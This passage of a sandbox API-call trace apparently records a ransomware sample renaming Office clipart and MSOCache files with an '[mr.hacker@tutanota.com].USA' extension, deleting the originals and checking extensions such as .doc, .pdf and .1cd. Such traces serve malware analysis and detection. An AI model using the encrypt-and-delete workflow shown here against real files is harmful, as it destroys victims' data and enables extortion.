lpOverlapped=0x0) returned 1 [0060.153] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.153] SetEndOfFile (hFile=0x248) returned 1 [0060.153] CloseHandle (hObject=0x248) returned 1 [0060.154] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.154] SetEndOfFile (hFile=0x1ec) returned 1 [0060.154] CloseHandle (hObject=0x1ec) returned 1 [0060.155] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 1 [0060.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0060.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0060.155] lstrlenW (lpString=".doc") returned 4 [0060.155] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString=".docx") returned 5 [0060.155] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.155] lstrlenW (lpString=".pdf") returned 4 [0060.155] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString=".xls") returned 4 [0060.155] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.155] lstrlenW (lpString=".xlsx") returned 5 [0060.155] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.155] lstrlenW (lpString=".ppt") returned 4 [0060.155] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0060.155] lstrlenW (lpString=".zip") returned 4 [0060.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.155] lstrlenW (lpString=".rar") returned 4 [0060.155] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString=".bz2") returned 4 [0060.155] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString=".7z") returned 3 [0060.155] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0060.156] lstrlenW (lpString=".dbf") returned 4 [0060.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0060.156] lstrlenW (lpString=".1cd") returned 4 [0060.156] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0060.156] lstrlenW (lpString=".jpg") returned 4 [0060.156] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.156] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=3104) returned 1 [0060.156] CloseHandle (hObject=0x1ec) returned 1 [0060.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 0x20 [0060.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.156] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.156] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.157] GetLastError () returned 0x0 [0060.157] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xc20, lpOverlapped=0x0) returned 1 [0060.158] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xc30, lpOverlapped=0x0) returned 1 [0060.159] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.159] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.159] SetEndOfFile (hFile=0x248) returned 1 [0060.159] CloseHandle (hObject=0x248) returned 1 [0060.159] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.159] SetEndOfFile (hFile=0x1ec) returned 1 [0060.160] CloseHandle (hObject=0x1ec) returned 1 [0060.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.160] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 1 [0060.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0060.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0060.161] lstrlenW (lpString=".doc") returned 4 [0060.161] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString=".docx") returned 5 [0060.161] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.161] lstrlenW (lpString=".pdf") returned 4 [0060.161] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString=".xls") returned 4 [0060.161] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.161] lstrlenW (lpString=".xlsx") returned 5 [0060.161] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.161] lstrlenW (lpString=".ppt") returned 4 [0060.161] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0060.161] lstrlenW (lpString=".zip") returned 4 [0060.161] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.161] lstrlenW (lpString=".rar") returned 4 [0060.161] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString=".bz2") returned 4 [0060.161] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString=".7z") returned 3 [0060.161] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0060.161] lstrlenW (lpString=".dbf") returned 4 [0060.161] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0060.161] lstrlenW (lpString=".1cd") returned 4 [0060.161] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0060.161] lstrlenW (lpString=".jpg") returned 4 [0060.162] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.162] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1588) returned 1 [0060.162] CloseHandle (hObject=0x1ec) returned 1 [0060.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) returned 0x20 [0060.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.162] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.162] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.163] GetLastError () returned 0x0 [0060.163] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x634, lpOverlapped=0x0) returned 1 [0060.516] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x640, lpOverlapped=0x0) returned 1 [0060.517] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.517] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.517] SetEndOfFile (hFile=0x248) returned 1 [0060.707] CloseHandle (hObject=0x248) returned 1 [0060.709] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.710] SetEndOfFile (hFile=0x1ec) returned 1 [0060.711] CloseHandle (hObject=0x1ec) returned 1 [0060.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.712] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) Thread: id = 12 os_tid = 0x9ac [0033.093] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x6908b0 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x6a08b8 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670118 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x6240c8 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670160 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3510020 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670178 [0033.094] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670178, Size=0x20) returned 0x626708 [0033.094] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670178 [0033.094] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670178, Size=0x20) returned 0x626730 [0033.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.095] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.095] Wow64DisableWow64FsRedirection (in: OldValue=0x2caff58 | out: OldValue=0x2caff58*=0x0) returned 1 [0033.095] lstrlenW (lpString="kernel32.dll") returned 12 [0033.095] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626708 | out: hHeap=0x5d0000) returned 1 [0033.095] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.095] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626730 | out: hHeap=0x5d0000) returned 1 [0033.095] Sleep (dwMilliseconds=0x64) [0033.964] Sleep (dwMilliseconds=0x64) [0034.109] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.110] lstrlenW (lpString="Setup.xml") returned 9 [0034.110] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.297] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2296) returned 1 [0034.297] CloseHandle (hObject=0x178) returned 1 [0034.297] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.297] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.297] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.297] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.297] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.297] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.297] GetLastError () returned 0x0 [0034.298] ReadFile (in: hFile=0x178, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x8f8, lpOverlapped=0x0) returned 1 [0034.318] WriteFile (in: hFile=0x17c, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x900, lpOverlapped=0x0) returned 1 [0034.319] ReadFile (in: hFile=0x178, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.319] WriteFile (in: hFile=0x17c, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.319] SetEndOfFile (hFile=0x17c) returned 1 [0034.320] CloseHandle (hObject=0x17c) returned 1 [0034.320] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.320] SetEndOfFile (hFile=0x178) returned 1 [0034.321] CloseHandle (hObject=0x178) returned 1 [0034.321] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.321] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.322] lstrlenW (lpString=".doc") returned 4 [0034.322] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString=".docx") returned 5 [0034.322] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.322] lstrlenW (lpString=".pdf") returned 4 [0034.322] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString=".xls") returned 4 [0034.322] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString=".xlsx") returned 5 [0034.322] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.322] lstrlenW (lpString=".ppt") returned 4 [0034.322] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.322] lstrlenW (lpString=".zip") returned 4 [0034.322] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.322] lstrlenW (lpString=".rar") returned 4 [0034.322] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString=".bz2") returned 4 [0034.322] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString=".7z") returned 3 [0034.322] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.322] lstrlenW (lpString=".dbf") returned 4 [0034.322] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.322] lstrlenW (lpString=".1cd") returned 4 [0034.322] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.322] lstrlenW (lpString=".jpg") returned 4 [0034.323] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.323] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.323] lstrlenW (lpString=".doc") returned 4 [0034.323] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString=".docx") returned 5 [0034.323] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.323] lstrlenW (lpString=".pdf") returned 4 [0034.323] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString=".xls") returned 4 [0034.323] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString=".xlsx") returned 5 [0034.323] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.323] lstrlenW (lpString=".ppt") returned 4 [0034.323] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.323] lstrlenW (lpString=".zip") returned 4 [0034.323] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.323] lstrlenW (lpString=".rar") returned 4 [0034.323] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString=".bz2") returned 4 [0034.323] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString=".7z") returned 3 [0034.323] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.323] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.323] lstrlenW (lpString=".dbf") returned 4 [0034.323] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.323] lstrlenW (lpString=".1cd") returned 4 [0034.323] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.323] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.323] lstrlenW (lpString=".jpg") returned 4 [0034.323] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.324] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.324] lstrlenW (lpString="Setup.xml") returned 9 [0034.324] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.469] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1608) returned 1 [0034.469] CloseHandle (hObject=0x170) returned 1 [0034.469] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.469] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.469] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.469] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.469] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.469] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.470] GetLastError () returned 0x0 [0034.470] ReadFile (in: hFile=0x170, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x648, lpOverlapped=0x0) returned 1 [0034.471] WriteFile (in: hFile=0x180, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x650, lpOverlapped=0x0) returned 1 [0034.472] ReadFile (in: hFile=0x170, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, 